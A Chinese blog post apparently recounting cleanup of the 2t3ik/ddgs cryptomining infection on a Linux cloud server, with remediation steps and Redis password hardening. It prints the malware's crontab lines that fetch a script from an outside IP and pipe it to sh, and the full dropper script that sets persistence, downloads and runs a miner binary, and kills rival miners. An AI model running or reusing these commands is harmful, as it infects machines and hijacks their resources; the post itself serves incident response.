`

2t3ik与ddgs挖矿病毒处理

 
阅读更多
一、问题现象
朋友的阿里云LINUX服务器, 发现有2t3ik与ddgs两个异常进程,把CPU几乎耗尽了。其描述kill掉以后,过一会儿又会重新出现。

2t3ik_worm

二、分析处理
即然kill 后过一会儿又会出现,那就有两种可能:1、crontab定时调用;2、有守护进程,个别病毒还会修改ps和top,通过这些命令无法查看到隐藏的守护进程。先看了下crontab,发现如下两条内容:

*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh
*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh 
查询了下165.225.157.157这个IP来自美国拉斯维加斯。获取了下i.sh脚本,发现内容如下:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/crontabs/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
if [ ! -f "/tmp/ddgs.3011" ]; then
    curl -fsSL http://165.225.157.157:8000/static/3011/ddgs.i686 -o /tmp/ddgs.3011
fi
chmod +x /tmp/ddgs.3011 && /tmp/ddgs.3011
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
简单的一个shell 脚本,前面是创建crontab定时任务,后面下面了ddgs.i686程序并执行。可以确定就是这个来自美国的国际友人的程序干的坏事了。

删除crontab内容,并kill 掉相关进程后,观察一段时间发现其不再重新出现。问题解决。当然,为避免其后面再出现,可以做以下预防操作:

cd /tmp/
rm -rf 2t3ik.p
rm -rf ddgs.3011
touch 2t3ik.p
touch ddgs.3011
chattr +i 2t3ik*
chattr +i ddgs*
三、产生原因
网上也找了下该病毒的相关信息,了解到其一般是由于安装了redis后,未设置密码或密码太过简单,导致的被入侵。redis密码修改方法如下:

redis-cli -h 127.0.0.1 -p 6379
config get requirepass //获取当前密码
config set requirepass "yourpassword"//设置当前密码,服务重新启动后又会置为默认,即无密码;
永久生效方法为,打开redis配置文件redis.conf,找到requirepass值修改密码,如下:

requirepass yourpassword  //此处注意,行前不能有空格
另外,平时还是建议安装chkrootkit、rkhunter、Lynis、ISPProtect这类安全工具,定期做扫描。
分享到:
| PHP消息队列实现及应用
评论
发表评论

您还没有登录,请您登录后再发表评论

相关推荐

    IKAnalyzer2012_u3

    IK Analyzer 2012 IKAnalyzer2012_u3 IK Analyzer 2012 IKAnalyzer2012_u3 IK Analyzer 2012 IKAnalyzer2012_u3

    最新版windows elasticsearch-analysis-ik-7.13.3.zip

    最新版windows elasticsearch-analysis-ik-7.13.3.zip最新版windows elasticsearch-analysis-ik-7.13.3.zip

    IKAnalyzer2012完整分发包

    3. IKAnalyzer.cfg.xml(分词器扩展配置文件) 4. stopword.dic(停止词典) 5. LICENSE.TXT ; NOTICE.TXT (apache版权申明) 它的安装部署十分简单,将 IKAnalyzer2012.jar 部署于项目的 lib 目录中; IK...

    最新版 elasticsearch-analysis-ik-7.9.3.zip

    最新版 elasticsearch-analysis-ik-7.9.3.zip

    Unity Final IK Unity IK最新2.0版本 支持Unity2020以下的版本

    Final IK是Unity的逆向运动学解决方案的插件。 Final IK包含: 用于Biped骨骼角色的全身IK系统 Biped IK :Unity的内置Avatar IK系统的替代品,提供更大的灵活性,并使用相同的API CCD IK: 循环坐标下降IK Multi-...

    elasticsearch-analysis-ik-7.16.3.zip

    es ik 中文分词器

    乐视路由-IK-AP-S3-1.4.7-qca953x 编程器固件

    乐视路由-IK-AP-S3-1.4.7-qca953x 编程器固件 带breed 乐视路由art数据 mac地址AAAAAAAAAAAA

    7.17.1系列Elasticsearch的elasticsearch-analysis-ik分词器

    适用于7.17.1系列,例如Elasticsearch的7.17.12版本。 elasticsearch-analysis-ik 是一个常用的...中文数字处理:elasticsearch-analysis-ik 还针对中文文本中的数字进行了特殊处理。它将连续的数字组合成一个整体。

    ik6.8.1.zip

    从2006年12月推出1.0版开始,IKAnalyzer已经推出 了3个大版本。最初,它是以开源项目Lucene为应用主体的,结合词典分词和文法分析算法的中文分词组件。新版本的IKAnalyzer3.0则发展为 面向Java的公用分词组件,独立...

    Final IK v2.0.zip

    inal IK包含: 用于Biped骨骼角色的全身IK系统 Biped IK :Unity的内置Avatar IK系统的替代品,提供更大的灵活性,并使用相同的API CCD IK: 循环坐标下降IK Multi-effector FABRIK:向前和向后到达IK Look-At IK Aim...

    Final-IK 2.1

    适用于unity的一款ik插件,最新版本

    final ik1.9下载

    更新 (1.9): 1.9 版本对最终逆向运动学 (Final IK) 进行了很多修复和改进: - 增加了烘焙器,这是一个强大的新工具,可将 IK 烘焙到 ...Final IK 1.9 与 PuppetMaster 0.9 和 Unity 2017/2018/2019 版本完全兼容。

    Final IK 2.2 - Unity

    Final IK 2.2 - Unity

    IKAnalyzer2012FF_u1.jar

    使用IK分词器,应为该集群使用到的solr版本为4.10.3-cdh5.7.5,所以使用的 IK 包为IKAnalyzer2012FF_u1.jar,如果是3x的solr,使用IKAnalyzer2012_u6.jar solr-4.10.3下载地址:...

    Final IK.zip

    Version 1.7 brings many fixes and improvements to Final IK: - Added the first multithreaded AnimationJob versions of Final IK solvers: CCDIKJ and AimIKJ.: - Added LookAtController. - Added leg ...

    Final IK 1.9 Final IK 1.9

    Final IK 1.9

    IK Analyzer 3.2.8中文分词器

    2. IKAnalyzer3.X.jar(主jar包) 3. IKAnalyzer.cfg.xml(分词器扩展配置文件) 4. ext_stopword.dic(扩展的stopword词典,3.2以上版本提供) 它的安装部署十分简单,将IKAnalyzer3.X.jar部署于项目的lib目录中...

    es:7.17.3-ik.tar.gz

    elasticsearch 带中文分词器的7.17.13版本镜像 x86架构

    Final IK 最新版2.1

    For the full history of release notes, see FinalIK Change Log.pdf in the package. Upgrade Guide - MAKE A BACKUP! Open a new scene, delete “Plugins/RootMotion” and reimport. Also reimport ...

    IkAnalyzer分词工具

    年12 月推出1.0 版开始, IKAnalyzer 已经推出了3 个大版本。最初,它是以开源项目 Luence 为应用主体的,结合词典分词和文法分析算法的中文分词组件。新版本的IK Analyzer 3.X 则发展为面向Java 的公用分词组件,...

Magicbox
Global site tag (gtag.js) - Google Analytics